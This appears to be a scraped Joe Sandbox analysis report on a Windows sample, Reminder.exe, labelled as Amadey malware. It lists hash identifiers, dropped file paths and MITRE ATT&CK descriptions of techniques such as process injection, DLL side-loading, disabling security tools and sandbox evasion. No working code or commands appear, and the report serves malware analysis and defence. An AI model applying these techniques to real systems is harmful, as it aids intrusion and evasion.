API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 3f01c3e556ba88ef034617e1a84852bf152df506999aa47b2768a4ac57b1ba7e
Instruction ID: 3184176d2736debb6b5bd333b3d3a904d2b06144c8376f476d65b23381d6d456
Opcode Fuzzy Hash: 3f01c3e556ba88ef034617e1a84852bf152df506999aa47b2768a4ac57b1ba7e
Instruction Fuzzy Hash: 09D0A731794301A7F6747730DC0FFC369105B04740F000421F206590C1C4E89C00C644

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Reminder.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Protection of GUI

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\huv9LF4.a3x

C:\Users\user\AppData\Local\Temp\is-9EGBF.tmp\_isetup\_isdecmp.dll

C:\Users\user\AppData\Local\Temp\is-9EGBF.tmp\_isetup\_setup64.tmp

C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp

C:\Users\user\AppData\Local\Temp\is-BOC6S.tmp\_isetup\_isdecmp.dll

C:\Users\user\AppData\Local\Temp\is-BOC6S.tmp\_isetup\_setup64.tmp

C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp

C:\Users\user\AppData\Local\friend\Updater.exe (copy)

C:\Users\user\AppData\Local\friend\is-25M5S.tmp

C:\Users\user\AppData\Local\friend\is-3HDT1.tmp

Windows Analysis Report
Reminder.exe

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre